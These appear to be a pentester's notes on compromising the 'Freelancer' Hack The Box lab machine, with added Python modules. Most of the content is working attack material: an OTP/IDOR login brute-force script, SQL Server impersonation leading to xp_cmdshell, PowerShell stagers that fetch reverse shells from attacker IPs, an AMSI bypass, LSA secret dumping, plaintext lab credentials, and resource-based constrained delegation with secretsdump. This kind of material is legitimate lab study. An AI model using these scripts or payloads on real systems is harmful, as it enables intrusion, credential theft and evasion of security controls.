1. Nmap
10.129.229.73
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 nginx 1.25.5
|_http-server-header: nginx/1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-02 15:34:25Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-02T15:35:14
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 50033/tcp): CLEAN (Timeout)
| Check 2 (port 50702/tcp): CLEAN (Timeout)
| Check 3 (port 41283/udp): CLEAN (Timeout)
| Check 4 (port 23390/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 4h59m59s
Note the ~5h clock skew: Kerberos rejects requests whose timestamp is more than 5 minutes off the DC, so sync first (sudo ntpdate freelancer.htb, or run each tool under faketime) before getST, psexec -k and anything else that authenticates with Kerberos.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.81 seconds
Raw packets sent: 131086 (5.768MB) | Rcvd: 54 (2.376KB)
2. Vhosts
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://freelancer.htb/ -H 'Host: FUZZ.freelancer.htb' -fs 0
No additional vhosts found.
3. Kerberos Queries
./kerbrute userenum -d freelancer.htb --dc freelancer.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -o users.freelancer
4. LDAP queries
ldapsearch -H ldaps://10.129.229.73:636/ -x -s base -b '' "(objectClass=*)" "*" + -> 0 entries (anonymous bind); the rootDSE details below come from the nmap ldap scripts instead
nmap -n -sV --script "ldap* and not brute" 10.129.229.73 ->
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=freelancer,DC=htb
| ldapServiceName: freelancer.htb:dc$@FREELANCER.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=freelancer,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| namingContexts: DC=freelancer,DC=htb
| namingContexts: CN=Configuration,DC=freelancer,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=freelancer,DC=htb
| namingContexts: DC=DomainDnsZones,DC=freelancer,DC=htb
| namingContexts: DC=ForestDnsZones,DC=freelancer,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 860400
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=freelancer,DC=htb
| dnsHostName: DC.freelancer.htb
| defaultNamingContext: DC=freelancer,DC=htb
| currentTime: 20240602154508.0Z
|_ configurationNamingContext: CN=Configuration,DC=freelancer,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb, Site: Default-First-Site-Name)
| ldap-rootdse: (identical to the port 389 output above; 3268 is the global catalog on the same DC)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
5. Port 80
whatweb:
http://10.129.229.73 [302 Found] Country[RESERVED][ZZ], HTTPServer[nginx/1.25.5], IP[10.129.229.73], RedirectLocation[http://freelancer.htb/], nginx[1.25.5]
http://freelancer.htb/ [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[support@freelancer.htb], HTML5, HTTPServer[nginx/1.25.5], IP[10.129.229.73], JQuery, Script, Title[Freelancer - Job Board & Hiring platform], UncommonHeaders[cross-origin-opener-policy,referrer-policy,x-content-type-options], X-Frame-Options[DENY], nginx[1.25.5]
ffuf:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://freelancer.htb/FUZZ -v -recursion
5.1 Employer account
Employer accounts are blocked by default after registration.
Registered employerDani:dani123!; new password after the reset flow: qwertyuiop!
5.2 OTP login script
#!/bin/bash
# The login link inside the QR code has the form
#   http://freelancer.htb/accounts/login/otp/<base64 user id>/<otp>/
# The OTP is single use, so a fresh QR code is fetched for every user id tried;
# a 302 on the forged link means the login went through for that id.
set -u
for i in {1..30}
do
  curl 'http://freelancer.htb/accounts/otp/qrcode/generate/' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
    -H 'Accept-Language: en-US' \
    -H 'Cache-Control: max-age=0' \
    -H 'Cookie: sessionid=y1bm79i9fkbyb7iybbp8iy72qbrcpr3d; csrftoken=EOODEl70367Atu9Mye6732XZbz9ZvjrB' \
    -H 'Proxy-Connection: keep-alive' \
    -H 'Upgrade-Insecure-Requests: 1' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36' \
    --insecure --silent --output qr.png
  # field 8 of the decoded URL (split on '/') is the OTP
  otp=$(zbarimg -q "qr.png" | cut -d'/' -f8)
  # echo adds a trailing newline, so this is base64 of "<id>\n"; use printf '%s' "$i" if the site's own links decode without it
  encoded=$(echo "$i" | base64)
  url="http://freelancer.htb/accounts/login/otp/${encoded}/${otp}/"
  response=$(curl --write-out '%{http_code}' --silent --output /dev/null "$url")
  if [ "$response" -eq 302 ]; then
    echo "Number $i worked as intended -> $encoded == $url"
  fi
done
Iterates over user ids and prints the ones the forged link logs in as. Because every OTP is consumed on use, a new QR code has to be generated for each attempt.
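Added example (mine, not from the original notes): the same loop as a stdlib-only Python module. It models the URL the QR code carries, the base64 id with the trailing newline that echo | base64 produces, and the single-use OTP refresh per attempt; the HTTP and QR-decode steps are injectable so the loop can be exercised offline. Assumed: the login URL shape shown above, zbarimg on PATH for the real decoder, and placeholder session cookies in the main block.

```python
import base64
import subprocess
import tempfile
import urllib.error
import urllib.request
from typing import Callable, Iterable

BASE = "http://freelancer.htb"
QR_PATH = "/accounts/otp/qrcode/generate/"
OTP_PATH = "/accounts/login/otp/"


def encode_user_id(user_id: int, trailing_newline: bool = True) -> str:
    """base64 of the id; `echo $i | base64` in the bash loop includes the newline."""
    raw = f"{user_id}\n" if trailing_newline else str(user_id)
    return base64.b64encode(raw.encode()).decode()


def parse_otp_url(url: str) -> tuple[int, str]:
    """Split .../accounts/login/otp/<b64 id>/<otp>/ into (user_id, otp)."""
    path = url.split("://", 1)[-1].split("/", 1)[1]      # strip scheme and host
    parts = [p for p in path.split("/") if p]
    if len(parts) != 5 or parts[:3] != ["accounts", "login", "otp"]:
        raise ValueError(f"unexpected OTP URL: {url!r}")
    user_id = int(base64.b64decode(parts[3]).decode().strip())  # strip() eats the newline
    return user_id, parts[4]


def forge_otp_url(user_id: int, otp: str, trailing_newline: bool = True) -> str:
    """The IDOR: keep the fresh OTP, swap in another user's id."""
    return f"{BASE}{OTP_PATH}{encode_user_id(user_id, trailing_newline)}/{otp}/"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):  # 302 is the success signal; do not follow it
        return None


def http_status(url: str) -> int:
    """Status code of a GET without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        return opener.open(url, timeout=10).status
    except urllib.error.HTTPError as err:
        return err.code


def fresh_otp_via_zbar(sessionid: str, csrftoken: str) -> str:
    """Download a new QR code with the logged-in session and decode it with zbarimg."""
    req = urllib.request.Request(
        BASE + QR_PATH,
        headers={"Cookie": f"sessionid={sessionid}; csrftoken={csrftoken}"})
    png = urllib.request.urlopen(req, timeout=10).read()
    with tempfile.NamedTemporaryFile(suffix=".png") as tmp:
        tmp.write(png)
        tmp.flush()
        out = subprocess.run(["zbarimg", "-q", "--raw", tmp.name],
                             capture_output=True, text=True, check=True).stdout
    return parse_otp_url(out.strip())[1]


def find_valid_ids(ids: Iterable[int], fresh_otp: Callable[[], str],
                   status: Callable[[str], int] = http_status) -> list[int]:
    """Each OTP is single use, so a new one is fetched per id; 302 means the login took."""
    hits = []
    for uid in ids:
        if status(forge_otp_url(uid, fresh_otp())) == 302:
            hits.append(uid)
    return hits


if __name__ == "__main__":
    # placeholder cookies: take sessionid/csrftoken from the logged-in browser session
    def otp_source() -> str:
        return fresh_otp_via_zbar("SESSIONID", "CSRFTOKEN")

    print(find_valid_ids(range(1, 31), otp_source))
```

find_valid_ids reports every id the forged link logs in as; pass a different status callable (or a recorded list of responses) to replay the loop without touching the target.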
6. SMB
Enum4Linux
$ enum4linux -a freelancer.htb -V
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 10 15:19:36 2024
=========================================( Target Information )=========================================
Target ........... freelancer.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on freelancer.htb )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for freelancer.htb )===============================
Looking up status of 10.129.192.223
No reply from 10.129.192.223
==================================( Session Check on freelancer.htb )==================================
[+] Server freelancer.htb allows sessions using username '', password ''
===============================( Getting domain SID for freelancer.htb )===============================
Domain Name: FREELANCER
Domain Sid: S-1-5-21-3542429192-2036945976-3483670807
[+] Host is part of a domain (not a workgroup)
===================( OS information on freelancer.htb )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for freelancer.htb from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
==========( Users on freelancer.htb )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==================( Share Enumeration on freelancer.htb )================================
do_connect: Connection to freelancer.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on freelancer.htb
==========( Password Policy Information for freelancer.htb )===========================
[E] Unexpected error from polenum:
[+] Attaching to freelancer.htb using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:FREELANCER.HTB)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=============( Groups on freelancer.htb )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on freelancer.htb via RID cycling (RIDS: 500-550,1000-1050) )=================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================( Getting printer info for freelancer.htb )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Jul 10 15:20:04 2024
7. Reverse shell via SQL injection
SQL terminal? (the statements below are run through it)
- sqlinjection
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXECUTE xp_cmdshell 'mshta.exe http://10.10.14.23:80/shell.hta';
- mshta is not on the system!!
Shell: msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.23 lport=2314 -f hta-psh > shell2314.hta
Does not work... xp_cmdshell does not work either: sp_configure needs the ALTER SETTINGS permission (sysadmin or serveradmin), which the web app's login does not have yet.
-- lists database-level principals; server logins live in sys.server_principals
select name as username,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type
from sys.database_principals
where type not in ('A', 'G', 'R', 'X')
and sid is not null
and name != 'guest'
order by username;
- Freelancer_webapp_user found (the login the web app connects with)
https://stackoverflow.com/questions/39072965/how-do-i-swap-the-current-user-in-sql-server
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
-- returns 1: the web app login can impersonate sa (IMPERSONATE on that login), so the session is now running as a sysadmin
EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
-- makes Freelancer_webapp_user sysadmin in its own right; REVERT afterwards, or keep running as sa
-- After running the above shell and not working...
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured
FROM sys.configurations
WHERE name = 'show advanced options'
--Gives 1
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured
FROM sys.configurations
WHERE name = 'xp_cmdshell'
--Gives 1

EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
EXECUTE xp_cmdshell 'cmd.exe /c powershell.exe -nop -w hidden -e <base64-encoded command>'
Maybe load to memory via IEX?
https://github.com/sergiovks/AntiVirus-Bypass-PowerShell-In-Memory-Injection too long
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
Execute xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.26/backup.bat)"'
Attempt 2
LHOST=10.10.14.26
LPORT=443
rshell=shell-443.txt
# powercat -ge prints the reverse shell as a base64-encoded PowerShell command
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /tmp/$rshell
- Creates the encoded reverse shell
LHOST=10.10.14.26
LPORT_web=80
rshell=shell-443.txt
# heredoc keeps the double quotes in the .bat; \$ stops bash expanding $code, ${LHOST} etc. are expanded
cat > /tmp/backup.bat <<EOF
START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${LHOST}:${LPORT_web}/${rshell}');iex 'powershell -E \$code'"
EOF
- Downloads the shell above. Kinda works but no shell yet
Attempt 3
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
Execute xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing \\10.10.14.26\share\oi)"'

Attempt Final
https://github.com/martinsohn/PowerShell-reverse-shell this powershell works
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
Execute xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.26/powershell-reverse-shell.ps1);"'
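Added example, not from the notes: the reasoning of section 7 in Python. Given IMPERSONATE grants in the shape of sys.server_permissions joined to sys.server_principals (only the Freelancer_webapp_user -> sa edge is what the notes found; the other two logins are invented for the demo), it finds the shortest EXECUTE AS LOGIN chain to a sysadmin and emits the T-SQL that walks it, grants sysadmin to the original login, enables xp_cmdshell and runs a PowerShell stager. The quoting helper doubles single quotes so a URL in quotes can sit inside the xp_cmdshell string literal, and the stager is sent as -EncodedCommand, which takes base64 of UTF-16LE rather than UTF-8. The stager URL is a placeholder.

```python
import base64
from collections import deque

# Constructed sample of what this returns for the web app's login:
#   SELECT pr.name AS grantee, tgt.name AS target
#   FROM sys.server_permissions pe
#   JOIN sys.server_principals pr  ON pe.grantee_principal_id = pr.principal_id
#   JOIN sys.server_principals tgt ON pe.major_id = tgt.principal_id
#   WHERE pe.permission_name = 'IMPERSONATE';
# Only the Freelancer_webapp_user -> sa edge is from the notes; the others are invented.
IMPERSONATE_EDGES = [
    ("Freelancer_webapp_user", "sa"),
    ("reporting_login", "Freelancer_webapp_user"),   # invented
    ("reporting_login", "audit_login"),               # invented
]
SYSADMINS = {"sa"}   # from sys.server_role_members / IS_SRVROLEMEMBER('sysadmin')


def impersonation_chain(start, edges, sysadmins):
    """Shortest chain of EXECUTE AS LOGIN hops from `start` to a sysadmin, or None."""
    graph = {}
    for grantee, target in edges:
        graph.setdefault(grantee, []).append(target)
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] in sysadmins:
            return path
        for nxt in graph.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def tsql_literal(value: str) -> str:
    """Embed in a single-quoted T-SQL string: double every single quote."""
    return "'" + value.replace("'", "''") + "'"


def encoded_powershell(script: str) -> str:
    """powershell -EncodedCommand takes base64 of UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def escalation_script(chain, command: str) -> str:
    """Walk the chain with EXECUTE AS LOGIN, make the original login sysadmin,
    REVERT back, then enable xp_cmdshell and run `command` through it."""
    original = chain[0]
    lines = [f"EXECUTE AS LOGIN = {tsql_literal(login)};" for login in chain[1:]]
    lines.append(f"EXEC sp_addsrvrolemember {tsql_literal(original)}, 'sysadmin';")
    lines.extend(["REVERT;"] * (len(chain) - 1))
    lines += [
        "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
        "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
        f"EXEC xp_cmdshell {tsql_literal(command)};",
    ]
    return "\n".join(lines)


def stager(url: str) -> str:
    """Command line for xp_cmdshell: fetch a script over HTTP and run it in memory."""
    return "powershell -nop -w hidden -EncodedCommand " + encoded_powershell(
        f"IEX (New-Object Net.WebClient).DownloadString('{url}')")


if __name__ == "__main__":
    chain = impersonation_chain("Freelancer_webapp_user", IMPERSONATE_EDGES, SYSADMINS)
    if chain is None:
        raise SystemExit("no impersonation path to a sysadmin login")
    # placeholder URL; point it at the hosted reverse shell script
    print(escalation_script(chain, stager("http://10.10.14.26/powershell-reverse-shell.ps1")))
```

Paste the printed batch into the SQL terminal as one statement; the REVERT lines matter because xp_cmdshell and the sp_configure calls should run as the now-sysadmin original login, not inside the impersonated context.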
8. sql_svc Revshell
The shell runs as sql_svc. One of the folders reachable here has an .INI (SQL Server setup configuration) with plaintext credentials; added to passwords.md.
Running the found passwords against all enumerated users:
crackmapexec smb freelancer.htb -u /home/dani/Documents/OffSec/Machines/HTB/Freelancer/Users.md -p /home/dani/Documents/OffSec/Machines/HTB/Freelancer/passwords.md --shares --continue-on-success 
mikasaAckerman:IL0v3ErenY3ager
9. Revshell as mikasaAckerman
.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.26:2314   (listener on 10.10.14.26:2314 first)


Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,

# base64 keeps the strings out of AMSI's own signatures; they decode to 'System.Management.Automation.AmsiUtils' and 'amsiInitFailed'
$s = [Ref].Assembly.GetType([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=')))
$f = $s.GetField([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('YW1zaUluaXRGYWlsZWQ=')), 'NonPublic,Static')
$f.SetValue($null, $true)
AMSI disabled for this process (amsiInitFailed forced to true, so later scans are skipped).
Now use oi.ps1 to load a meterpreter shell into memory.
Run with: IEX (iwr -usebasicparsing http://10.10.14.26/oi.ps1)
- Works!!
10. Memory Dump
Install volatility3 and dump the LSA secrets from the memory dump: python3 vol.py -f ../MEMORY.DMP windows.lsadump > lsa.dump
Found in the LSA secrets: PWN3D#l0rr@Armessa199
again crackmapexec: crackmapexec smb freelancer.htb -u /home/dani/Documents/OffSec/Machines/HTB/Freelancer/Users.md -p /home/dani/Documents/OffSec/Machines/HTB/Freelancer/passwords.md --shares --continue-on-success
Worked: freelancer.htb 445 DC [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199
Checking bloodhound: bloodhound-python -c all --dns-tcp --zip -u 'lorra199' -p 'PWN3D#l0rr@Armessa199' -ns 10.129.151.81 -d freelancer.htb
The email suggests the possibility of adding a computer: impacket-addcomputer -computer-name 'BADPC$' -computer-pass 'SomePassword' -dc-host freelancer.htb -domain-netbios FREELANCER freelancer/lorra199:'PWN3D#l0rr@Armessa199'
(-domain-netbios takes the NetBIOS name, FREELANCER per enum4linux, not the DNS name)
11. Resource-Based Constrained Delegation

impacket-rbcd -delegate-from 'BADPC$' -delegate-to 'DC$' -action 'write' freelancer/lorra199:'PWN3D#l0rr@Armessa199' -dc-ip freelancer.htb
impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate 'Administrator' 'freelancer/BADPC$:SomePassword' -dc-ip freelancer.htb


worked
https://wadcoms.github.io/wadcoms/Impacket-PsExec-PassTheTicket/
export KRB5CCNAME=/home/dani/Documents/Machines/Freelancer/Administrator@cifs_DC.freelancer.htb@FREELANCER.HTB.ccache; impacket-psexec dc.freelancer.htb -k -no-pass
accepts ticket but does not load
Things to check before retrying: local clock within 5 minutes of the DC (nmap reported ~5h skew), target name equal to the SPN host in the ticket (dc.freelancer.htb, mapped in /etc/hosts), and the ticket only covers cifs, so stick to SMB-based tools.
secretsdump with the same ticket: impacket-secretsdump -k -no-pass dc.freelancer.htb
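Added example (stdlib Python, mine rather than impacket's code) of what impacket-rbcd -action write puts into msDS-AllowedToActOnBehalfOfOtherIdentity on DC$: a self-relative security descriptor whose DACL grants BADPC$ an ACCESS_ALLOWED_ACE, and a parser that lists the SIDs in that DACL, which is also what a defender should run over every computer object carrying the attribute. The domain SID is the one enum4linux returned; the RID 1105 for BADPC$ and the full-control mask are assumptions, and the KDC looks for the front-end service's SID in this DACL when it evaluates S4U2Proxy.

```python
import struct

DOMAIN_SID = "S-1-5-21-3542429192-2036945976-3483670807"   # from enum4linux above
BADPC_SID = DOMAIN_SID + "-1105"                            # RID of BADPC$ is assumed
ADMINISTRATORS = "S-1-5-32-544"                             # owner/group used in the SD

SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF                                   # assumed mask for the ACE


def sid_to_bytes(sid: str) -> bytes:
    """S-1-5-21-... -> binary SID (revision, count, 48-bit big-endian authority, LE subauthorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID: {sid}")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes) -> tuple[str, int]:
    """Inverse of sid_to_bytes; returns (sid string, bytes consumed)."""
    rev, count = struct.unpack_from("<BB", data, 0)
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_sd(*sids: str) -> bytes:
    """Self-relative security descriptor: owner/group = BUILTIN\\Administrators,
    DACL with one ACCESS_ALLOWED_ACE per SID that may delegate to the target."""
    aces = b""
    for sid in sids:
        body = struct.pack("<I", FULL_CONTROL) + sid_to_bytes(sid)
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(sids), 0) + aces
    owner = group = sid_to_bytes(ADMINISTRATORS)
    off_owner = 20                                  # SECURITY_DESCRIPTOR header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + group + acl


def allowed_to_act_sids(sd: bytes) -> list[str]:
    """SIDs granted in the DACL of a self-relative SD (empty if no DACL is present)."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
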